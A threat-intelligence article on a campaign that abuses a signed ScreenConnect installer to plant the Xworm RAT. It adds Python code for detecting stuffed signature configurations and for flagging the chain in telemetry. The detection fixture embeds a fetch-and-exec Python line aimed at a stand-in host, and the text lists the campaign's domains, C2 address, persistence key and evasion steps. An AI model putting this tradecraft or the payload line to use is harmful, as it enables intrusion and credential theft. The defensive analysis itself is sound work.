Weaponized ScreenConnect RMM Tool Deceives Users into Installing Xworm RAT

In a sophisticated cyberattack uncovered by Trustwave's SpiderLabs team, threat actors abused the legitimate remote management tool ScreenConnect to deploy the Xworm Remote Access Trojan (RAT). The multi-stage infection chain leverages deceptive AI-themed content and manipulates the installer's digital signature to evade detection.

Initial Attack Vector:

The campaign begins with social engineering tactics, enticing victims to visit counterfeit AI websites such as gptgrok[.]ai, which redirects to anhemvn6[.]com. Here, users are prompted to download files with names like Creation_Made_By_GrokAI.mp4 Grok.com, which are actually disguised installers for ScreenConnect. Variations of these filenames, including references to GoogleAI and SoraAI, suggest a broad campaign exploiting the credibility of AI-related terms.

Exploitation of Code-Signing Certificates:

The attackers manipulated the Microsoft Authenticode code-signing data of the legitimate ScreenConnect binary to embed a malicious configuration inside its digital signature. Upon execution, the installer deploys the ScreenConnect client in the user's Temp directory, configured to operate covertly. It connects silently to an attacker-controlled ScreenConnect server using the parameters embedded in the Authenticode signature; because the signature itself remains valid, integrity checks do not flag the file as tampered. Visual indicators are disabled to keep the session invisible to the user.
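The reason configuration can be parked inside a signed binary without breaking the signature is that the Authenticode hash covers the PE image minus the certificate table (the IMAGE_DIRECTORY_ENTRY_SECURITY data), so bytes appended to a WIN_CERTIFICATE entry are never hashed. The following added example, which is not code from the original report or from Trustwave, walks that certificate table and reports readable key=value strings found inside a signature entry. The key=value&amp; layout of the sample configuration, the relay hostname and the sample table bytes are all constructed for illustration and are not taken from the report.

```python
import re
import struct

# Constants from wincert.h
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def security_directory(pe: bytes) -> bytes:
    """Return the raw certificate table of a PE image.

    Unlike other data directories, the first field of the security
    directory is a file offset, not an RVA.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+ data directory start
    offset, size = struct.unpack_from("<II", pe, dir_base + 4 * 8)  # index 4 = SECURITY
    if offset == 0 or size == 0:
        return b""
    return pe[offset:offset + size]


def parse_certificate_table(blob: bytes) -> list:
    """Walk WIN_CERTIFICATE entries: DWORD dwLength, WORD wRevision,
    WORD wCertificateType, BYTE bCertificate[]; entries are 8-byte aligned."""
    entries = []
    offset = 0
    while offset + 8 <= len(blob):
        length, revision, cert_type = struct.unpack_from("<IHH", blob, offset)
        if length < 8 or offset + length > len(blob):
            raise ValueError("malformed WIN_CERTIFICATE entry")
        entries.append({"revision": revision, "type": cert_type,
                        "data": blob[offset + 8:offset + length]})
        offset += (length + 7) & ~7
    return entries


# Assumption: a stuffed configuration looks like a URL-style query string.
CONFIG_PATTERN = re.compile(rb"(?:[A-Za-z]+=[^&\x00]{1,256}&?){2,}")


def find_embedded_config(entry_data: bytes) -> list:
    """Return readable key=value runs found inside one signature entry.
    Legitimate PKCS#7 DER data does not normally contain such runs."""
    return [m.group(0).decode("ascii", "replace")
            for m in CONFIG_PATTERN.finditer(entry_data)]


def scan_certificate_table(blob: bytes) -> list:
    """(entry index, configs) for every entry that carries embedded config."""
    hits = []
    for i, entry in enumerate(parse_certificate_table(blob)):
        found = find_embedded_config(entry["data"])
        if found:
            hits.append((i, found))
    return hits


def _entry(body: bytes) -> bytes:
    """Build one WIN_CERTIFICATE entry with trailing alignment padding."""
    length = 8 + len(body)
    header = struct.pack("<IHH", length, WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA)
    return header + body + b"\x00" * (((length + 7) & ~7) - length)


# Constructed sample table: entry 0 carries a stand-in DER prefix plus a
# stuffed configuration; entry 1 is a clean stand-in. Not real signature data.
SAMPLE_CONFIG = b"e=Access&y=Guest&h=relay.example.invalid&p=8041&k=CONSTRUCTED"
SAMPLE_TABLE = (_entry(bytes.fromhex("3082") + b"\x00" * 10 + SAMPLE_CONFIG)
                + _entry(bytes.fromhex("3082") + b"\x00" * 5))

if __name__ == "__main__":
    for index, configs in scan_certificate_table(SAMPLE_TABLE):
        print(f"entry {index}: {configs}")
```

To run it against a real file, pass `security_directory(open(path, "rb").read())` to `scan_certificate_table`; a hit means the signature blob carries plaintext configuration that the signature verification never looked at, which is worth a manual look regardless of what the signer field says.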

Payload Deployment and Execution:

During the remote access session, attackers deploy a batch script named X-META Firebase_crypted.bat, which triggers mshta.exe to launch another hidden batch file. This script downloads and unpacks 5btc.zip from anhemvn4[.]com, revealing a Python interpreter renamed to pw.exe and an encoded basse64.txt payload. Instead of writing malicious code to disk, the attackers use process hollowing techniques with msedge.exe and chrome.exe, injecting Base64-encoded Python commands fetched directly from a public GitHub repository. This fileless execution method hinders static detection and allows the Xworm RAT components to be delivered stealthily.

Establishing Persistence:

To maintain long-term access, the attackers create a Run key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run named Windows Security, pointing to a backup.bat script in C:\xmetavip. Upon each login, this script re-launches pw.exe with new Base64 commands, fetching additional payloads such as buquabua.txt.
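The payload-deployment and persistence stages above each leave host telemetry a detection engineer can key on: mshta.exe spawning a batch file, a renamed interpreter launched with Base64-encoded Python, a browser process started by an unexpected parent (the hollowing target), and a Run value whose data is a script. The following added example, written here and not part of the original report, runs those four checks over a small set of constructed process-creation and registry-write events modelled on the chain described; the file paths, hostname and parent allowlist are constructed assumptions, not indicators from the report.

```python
import base64
import re
from typing import Dict, List

BROWSER_IMAGES = ("msedge.exe", "chrome.exe")
# Assumption: site-specific allowlist of parents that normally start a browser.
EXPECTED_BROWSER_PARENTS = ("explorer.exe", "msedge.exe", "chrome.exe", "svchost.exe")
SCRIPT_SUFFIXES = (".bat", ".cmd", ".vbs", ".hta", ".ps1")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Constructed inner payload, Base64-wrapped the way a "-c" launcher would carry it.
_INNER = b"import urllib.request;exec(urllib.request.urlopen('https://example.invalid/x').read())"
_B64 = base64.b64encode(_INNER).decode()

# Constructed sample telemetry (not real logs): one event per stage, plus a benign control.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\stage2.hta"},
    {"id": "2", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"cmd.exe /c C:\xmetavip\stage2.bat"},
    {"id": "3", "type": "process", "image": r"C:\xmetavip\pw.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"pw.exe -c \"import base64;exec(base64.b64decode('{_B64}'))\""},
    {"id": "4", "type": "process",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent": r"C:\xmetavip\pw.exe", "cmdline": "msedge.exe"},
    {"id": "5", "type": "process",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe"},   # benign control
    {"id": "6", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Windows Security", "data": r"C:\xmetavip\backup.bat"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decodes_to_python(cmdline: str) -> bool:
    """True if a long Base64 token in the command line decodes to Python source."""
    for token in B64_TOKEN.findall(cmdline):
        try:
            decoded = base64.b64decode(token, validate=True)
        except Exception:
            continue
        if b"import " in decoded or b"exec(" in decoded:
            return True
    return False


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips."""
    hits = []
    if ev["type"] == "process":
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if parent == "mshta.exe" and ".bat" in cmd.lower():
            hits.append("mshta-launches-batch")
        if decodes_to_python(cmd):
            hits.append("base64-python-in-cmdline")
        if image in BROWSER_IMAGES and parent not in EXPECTED_BROWSER_PARENTS:
            hits.append("browser-spawned-by-unexpected-parent")
    elif ev["type"] == "registry":
        if (ev["key"].lower().endswith(r"\currentversion\run")
                and ev["data"].lower().endswith(SCRIPT_SUFFIXES)):
            hits.append("run-key-points-to-script")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id to its rule hits, dropping events that trip nothing."""
    return {ev["id"]: hits for ev in events if (hits := check_event(ev))}


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

The checks are deliberately behavioural rather than hash-based: the interpreter is renamed, the payload is fetched at runtime and the Run value name imitates a Windows component, so none of the file-level indicators above survive the next build of the campaign, whereas parent-child relationships and a decoded command line do.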

Credential Access and Discovery:

The campaign includes stages for credential access and system discovery. WMI queries gather operating system and antivirus details, while the RAT attempts to harvest browser-stored login data from Chrome, Edge, and Firefox profiles. Analysts noted that the GitHub repository hosting the obfuscated Python scripts contained eleven files, split between persistence implanters and complex RAT loaders, created just a week before the attack. One final payload script, Exppiyt.txt, embedded a command-and-control server address (5[.]181[.]165[.]102:7705) that was not flagged as malicious on VirusTotal at the time of analysis.

Implications and Recommendations:

This incident underscores a growing trend where attackers co-opt trusted tools and AI branding to bypass automated defenses. Modern Endpoint Detection and Response (EDR) and signature-based solutions struggled to detect this threat, highlighting the importance of proactive, human-led threat hunting. Organizations are advised to invest in skilled threat hunters who can think like attackers, combining automated detection with expert analysis to uncover hidden threats before they can inflict damage.